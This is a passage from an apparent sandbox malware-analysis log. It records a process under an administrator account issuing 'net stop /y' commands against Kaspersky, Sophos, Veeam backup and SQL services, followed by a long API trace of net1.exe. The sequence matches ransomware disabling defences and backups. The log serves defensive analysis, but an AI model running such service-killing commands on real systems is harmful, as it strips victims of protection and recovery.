= "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 488 os_tid = 0xae8 Process: id = "118" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1bff2000" os_pid = "0x2a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 489 os_tid = 0x34c Process: id = "119" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x250fb000" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 490 os_tid = 0xd88 Process: id = "120" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a702000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 491 os_tid = 0xcb8 Process: id = "121" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2520b000" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 492 os_tid = 0xdbc Process: id = "122" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2514f000" os_pid = "0xdd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0xd10" cmd_line = "C:\\Windows\\system32\\net1 stop SavRoam /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 493 os_tid = 0xa48 [0105.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f7ec | out: lpSystemTimeAsFileTime=0x10f7ec*(dwLowDateTime=0x13e1d270, dwHighDateTime=0x1d6f0d1)) [0105.460] GetCurrentProcessId () returned 0xdd8 [0105.460] GetCurrentThreadId () returned 0xa48 [0105.460] GetTickCount () returned 0x114e409 [0105.460] QueryPerformanceCounter (in: lpPerformanceCount=0x10f7e4 | out: lpPerformanceCount=0x10f7e4*=22456129027) returned 1 [0105.461] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0105.461] __set_app_type (_Type=0x1) [0105.461] __p__fmode () returned 0x770331f4 [0105.461] __p__commode () returned 0x770331fc [0105.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0105.461] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0105.461] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.462] GetConsoleOutputCP () returned 0x1b5 [0105.462] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0105.462] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.466] sprintf_s (in: _DstBuf=0x10f7a4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.466] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0105.468] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.468] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SavRoam /y" [0105.468] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f570, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.468] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x62) returned 0x563ad0 [0105.547] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.547] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10f774 | out: Buffer=0x10f774*=0x561ad8) returned 0x0 [0105.547] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10f774 | out: Buffer=0x10f774*=0x561af0) returned 0x0 [0105.547] _fileno (_File=0x77032900) returned -2 [0105.547] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.547] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.547] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.547] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.547] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.547] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.547] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.547] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.547] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.547] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.548] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.548] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.548] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.548] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.548] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.548] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.548] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.548] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.548] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.548] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.548] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.548] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.548] _wcsicmp (_String1="accounts", _String2="SavRoam") returned -18 [0105.548] _wcsicmp (_String1="computer", _String2="SavRoam") returned -16 [0105.548] _wcsicmp (_String1="config", _String2="SavRoam") returned -16 [0105.548] _wcsicmp (_String1="continue", _String2="SavRoam") returned -16 [0105.548] _wcsicmp (_String1="cont", _String2="SavRoam") returned -16 [0105.548] _wcsicmp (_String1="file", _String2="SavRoam") returned -13 [0105.548] _wcsicmp (_String1="files", _String2="SavRoam") returned -13 [0105.548] _wcsicmp (_String1="group", _String2="SavRoam") returned -12 [0105.548] _wcsicmp (_String1="groups", _String2="SavRoam") returned -12 [0105.548] _wcsicmp (_String1="help", _String2="SavRoam") returned -11 [0105.548] _wcsicmp (_String1="helpmsg", _String2="SavRoam") returned -11 [0105.549] _wcsicmp (_String1="localgroup", _String2="SavRoam") returned -7 [0105.549] _wcsicmp (_String1="pause", _String2="SavRoam") returned -3 [0105.549] _wcsicmp (_String1="session", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="sessions", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="sess", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="share", _String2="SavRoam") returned 7 [0105.549] _wcsicmp (_String1="start", _String2="SavRoam") returned 19 [0105.549] _wcsicmp (_String1="stats", _String2="SavRoam") returned 19 [0105.549] _wcsicmp (_String1="statistics", _String2="SavRoam") returned 19 [0105.549] _wcsicmp (_String1="stop", _String2="SavRoam") returned 19 [0105.549] _wcsicmp (_String1="time", _String2="SavRoam") returned 1 [0105.549] _wcsicmp (_String1="user", _String2="SavRoam") returned 2 [0105.549] _wcsicmp (_String1="users", _String2="SavRoam") returned 2 [0105.549] _wcsicmp (_String1="msg", _String2="SavRoam") returned -6 [0105.549] _wcsicmp (_String1="messenger", _String2="SavRoam") returned -6 [0105.549] _wcsicmp (_String1="receiver", _String2="SavRoam") returned -1 [0105.549] _wcsicmp (_String1="rcv", _String2="SavRoam") returned -1 [0105.549] _wcsicmp (_String1="netpopup", _String2="SavRoam") returned -5 [0105.549] _wcsicmp (_String1="redirector", _String2="SavRoam") returned -1 [0105.549] _wcsicmp (_String1="redir", _String2="SavRoam") returned -1 [0105.549] _wcsicmp (_String1="rdr", _String2="SavRoam") returned -1 [0105.549] _wcsicmp (_String1="workstation", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="work", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="wksta", _String2="SavRoam") returned 4 [0105.549] _wcsicmp (_String1="prdr", _String2="SavRoam") returned -3 [0105.550] _wcsicmp (_String1="devrdr", _String2="SavRoam") returned -15 [0105.550] _wcsicmp (_String1="lanmanworkstation", _String2="SavRoam") returned -7 [0105.550] _wcsicmp (_String1="server", _String2="SavRoam") returned 4 [0105.550] _wcsicmp (_String1="svr", _String2="SavRoam") returned 21 [0105.550] _wcsicmp (_String1="srv", _String2="SavRoam") returned 17 [0105.550] _wcsicmp (_String1="lanmanserver", _String2="SavRoam") returned -7 [0105.550] _wcsicmp (_String1="alerter", _String2="SavRoam") returned -18 [0105.550] _wcsicmp (_String1="netlogon", _String2="SavRoam") returned -5 [0105.550] _wcsupr (in: _String="SavRoam" | out: _String="SAVROAM") returned="SAVROAM" [0105.550] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x565498 [0105.553] GetServiceKeyNameW (in: hSCManager=0x565498, lpDisplayName="SAVROAM", lpServiceName=0x3faaf0, lpcchBuffer=0x10f710 | out: lpServiceName="", lpcchBuffer=0x10f710) returned 0 [0105.553] _wcsicmp (_String1="msg", _String2="SAVROAM") returned -6 [0105.554] _wcsicmp (_String1="messenger", _String2="SAVROAM") returned -6 [0105.554] _wcsicmp (_String1="receiver", _String2="SAVROAM") returned -1 [0105.554] _wcsicmp (_String1="rcv", _String2="SAVROAM") returned -1 [0105.554] _wcsicmp (_String1="redirector", _String2="SAVROAM") returned -1 [0105.554] _wcsicmp (_String1="redir", _String2="SAVROAM") returned -1 [0105.554] _wcsicmp (_String1="rdr", _String2="SAVROAM") returned -1 [0105.554] _wcsicmp (_String1="workstation", _String2="SAVROAM") returned 4 [0105.554] _wcsicmp (_String1="work", _String2="SAVROAM") returned 4 [0105.554] _wcsicmp (_String1="wksta", _String2="SAVROAM") returned 4 [0105.554] _wcsicmp (_String1="prdr", _String2="SAVROAM") returned -3 [0105.554] _wcsicmp (_String1="devrdr", _String2="SAVROAM") returned -15 [0105.554] _wcsicmp (_String1="lanmanworkstation", _String2="SAVROAM") returned -7 [0105.554] _wcsicmp (_String1="server", _String2="SAVROAM") returned 4 [0105.554] _wcsicmp (_String1="svr", _String2="SAVROAM") returned 21 [0105.554] _wcsicmp (_String1="srv", _String2="SAVROAM") returned 17 [0105.554] _wcsicmp (_String1="lanmanserver", _String2="SAVROAM") returned -7 [0105.554] _wcsicmp (_String1="alerter", _String2="SAVROAM") returned -18 [0105.554] _wcsicmp (_String1="netlogon", _String2="SAVROAM") returned -5 [0105.554] NetServiceControl (in: servername=0x0, service="SAVROAM", opcode=0x0, arg=0x0, bufptr=0x10f70c | out: bufptr=0x10f70c) returned 0x889 [0105.555] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.555] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.556] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.557] GetFileType (hFile=0x0) returned 0x0 [0105.557] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x563eb8 [0105.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x563eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0105.557] WriteFile (in: hFile=0x0, lpBuffer=0x563eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f64c, lpOverlapped=0x0) returned 0 [0105.557] LocalFree (hMem=0x563eb8) returned 0x0 [0105.557] GetFileType (hFile=0x0) returned 0x0 [0105.557] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566160 [0105.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0105.557] WriteFile (in: hFile=0x0, lpBuffer=0x566160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f64c, lpOverlapped=0x0) returned 0 [0105.557] LocalFree (hMem=0x566160) returned 0x0 [0105.557] _ultow (in: _Dest=0x889, _Radix=1111676 | out: _Dest=0x889) returned="2185" [0105.557] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.557] GetFileType (hFile=0x0) returned 0x0 [0105.557] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x566160 [0105.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x566160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0105.557] WriteFile (in: hFile=0x0, lpBuffer=0x566160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10f658, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f658, lpOverlapped=0x0) returned 0 [0105.557] LocalFree (hMem=0x566160) returned 0x0 [0105.557] GetFileType (hFile=0x0) returned 0x0 [0105.557] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566160 [0105.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0105.558] WriteFile (in: hFile=0x0, lpBuffer=0x566160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f658, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f658, lpOverlapped=0x0) returned 0 [0105.558] LocalFree (hMem=0x566160) returned 0x0 [0105.558] NetApiBufferFree (Buffer=0x561ad8) returned 0x0 [0105.558] NetApiBufferFree (Buffer=0x561af0) returned 0x0 [0105.558] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SavRoam /y" [0105.558] exit (_Code=2) Process: id = "123" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x26ba6000" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0xd24" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 494 os_tid = 0x824 [0105.797] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf95c | out: lpSystemTimeAsFileTime=0xcf95c*(dwLowDateTime=0x141630b0, dwHighDateTime=0x1d6f0d1)) [0105.797] GetCurrentProcessId () returned 0x8a4 [0105.797] GetCurrentThreadId () returned 0x824 [0105.797] GetTickCount () returned 0x114e560 [0105.797] QueryPerformanceCounter (in: lpPerformanceCount=0xcf954 | out: lpPerformanceCount=0xcf954*=22489834227) returned 1 [0105.798] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0105.798] __set_app_type (_Type=0x1) [0105.798] __p__fmode () returned 0x770331f4 [0105.798] __p__commode () returned 0x770331fc [0105.798] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0105.798] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0105.798] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.798] GetConsoleOutputCP () returned 0x1b5 [0105.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0105.799] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.802] sprintf_s (in: _DstBuf=0xcf914, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.802] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.804] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0105.804] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.805] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0105.805] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf6e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.805] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x76) returned 0x23f658 [0105.805] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.805] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcf8e4 | out: Buffer=0xcf8e4*=0x241af8) returned 0x0 [0105.805] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcf8e4 | out: Buffer=0xcf8e4*=0x241b10) returned 0x0 [0105.805] _fileno (_File=0x77032900) returned -2 [0105.805] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.805] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.805] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.806] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.806] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.806] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.806] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.806] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.806] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.806] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.806] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.806] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.806] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.806] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.806] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.806] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.806] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.807] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.807] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.807] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.807] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.807] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.807] _wcsicmp (_String1="accounts", _String2="VeeamTransportSvc") returned -21 [0105.807] _wcsicmp (_String1="computer", _String2="VeeamTransportSvc") returned -19 [0105.807] _wcsicmp (_String1="config", _String2="VeeamTransportSvc") returned -19 [0105.807] _wcsicmp (_String1="continue", _String2="VeeamTransportSvc") returned -19 [0105.807] _wcsicmp (_String1="cont", _String2="VeeamTransportSvc") returned -19 [0105.807] _wcsicmp (_String1="file", _String2="VeeamTransportSvc") returned -16 [0105.807] _wcsicmp (_String1="files", _String2="VeeamTransportSvc") returned -16 [0105.807] _wcsicmp (_String1="group", _String2="VeeamTransportSvc") returned -15 [0105.807] _wcsicmp (_String1="groups", _String2="VeeamTransportSvc") returned -15 [0105.807] _wcsicmp (_String1="help", _String2="VeeamTransportSvc") returned -14 [0105.807] _wcsicmp (_String1="helpmsg", _String2="VeeamTransportSvc") returned -14 [0105.807] _wcsicmp (_String1="localgroup", _String2="VeeamTransportSvc") returned -10 [0105.807] _wcsicmp (_String1="pause", _String2="VeeamTransportSvc") returned -6 [0105.807] _wcsicmp (_String1="session", _String2="VeeamTransportSvc") returned -3 [0105.807] _wcsicmp (_String1="sessions", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="sess", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="share", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="start", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="stats", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="statistics", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="stop", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="time", _String2="VeeamTransportSvc") returned -2 [0105.808] _wcsicmp (_String1="user", _String2="VeeamTransportSvc") returned -1 [0105.808] _wcsicmp (_String1="users", _String2="VeeamTransportSvc") returned -1 [0105.808] _wcsicmp (_String1="msg", _String2="VeeamTransportSvc") returned -9 [0105.808] _wcsicmp (_String1="messenger", _String2="VeeamTransportSvc") returned -9 [0105.808] _wcsicmp (_String1="receiver", _String2="VeeamTransportSvc") returned -4 [0105.808] _wcsicmp (_String1="rcv", _String2="VeeamTransportSvc") returned -4 [0105.808] _wcsicmp (_String1="netpopup", _String2="VeeamTransportSvc") returned -8 [0105.808] _wcsicmp (_String1="redirector", _String2="VeeamTransportSvc") returned -4 [0105.808] _wcsicmp (_String1="redir", _String2="VeeamTransportSvc") returned -4 [0105.808] _wcsicmp (_String1="rdr", _String2="VeeamTransportSvc") returned -4 [0105.808] _wcsicmp (_String1="workstation", _String2="VeeamTransportSvc") returned 1 [0105.808] _wcsicmp (_String1="work", _String2="VeeamTransportSvc") returned 1 [0105.808] _wcsicmp (_String1="wksta", _String2="VeeamTransportSvc") returned 1 [0105.808] _wcsicmp (_String1="prdr", _String2="VeeamTransportSvc") returned -6 [0105.808] _wcsicmp (_String1="devrdr", _String2="VeeamTransportSvc") returned -18 [0105.808] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamTransportSvc") returned -10 [0105.808] _wcsicmp (_String1="server", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="svr", _String2="VeeamTransportSvc") returned -3 [0105.808] _wcsicmp (_String1="srv", _String2="VeeamTransportSvc") returned -3 [0105.809] _wcsicmp (_String1="lanmanserver", _String2="VeeamTransportSvc") returned -10 [0105.809] _wcsicmp (_String1="alerter", _String2="VeeamTransportSvc") returned -21 [0105.809] _wcsicmp (_String1="netlogon", _String2="VeeamTransportSvc") returned -8 [0105.809] _wcsupr (in: _String="VeeamTransportSvc" | out: _String="VEEAMTRANSPORTSVC") returned="VEEAMTRANSPORTSVC" [0105.809] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x245448 [0105.811] GetServiceKeyNameW (in: hSCManager=0x245448, lpDisplayName="VEEAMTRANSPORTSVC", lpServiceName=0x3faaf0, lpcchBuffer=0xcf880 | out: lpServiceName="", lpcchBuffer=0xcf880) returned 0 [0105.812] _wcsicmp (_String1="msg", _String2="VEEAMTRANSPORTSVC") returned -9 [0105.812] _wcsicmp (_String1="messenger", _String2="VEEAMTRANSPORTSVC") returned -9 [0105.812] _wcsicmp (_String1="receiver", _String2="VEEAMTRANSPORTSVC") returned -4 [0105.812] _wcsicmp (_String1="rcv", _String2="VEEAMTRANSPORTSVC") returned -4 [0105.812] _wcsicmp (_String1="redirector", _String2="VEEAMTRANSPORTSVC") returned -4 [0105.812] _wcsicmp (_String1="redir", _String2="VEEAMTRANSPORTSVC") returned -4 [0105.812] _wcsicmp (_String1="rdr", _String2="VEEAMTRANSPORTSVC") returned -4 [0105.812] _wcsicmp (_String1="workstation", _String2="VEEAMTRANSPORTSVC") returned 1 [0105.812] _wcsicmp (_String1="work", _String2="VEEAMTRANSPORTSVC") returned 1 [0105.812] _wcsicmp (_String1="wksta", _String2="VEEAMTRANSPORTSVC") returned 1 [0105.812] _wcsicmp (_String1="prdr", _String2="VEEAMTRANSPORTSVC") returned -6 [0105.812] _wcsicmp (_String1="devrdr", _String2="VEEAMTRANSPORTSVC") returned -18 [0105.812] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMTRANSPORTSVC") returned -10 [0105.812] 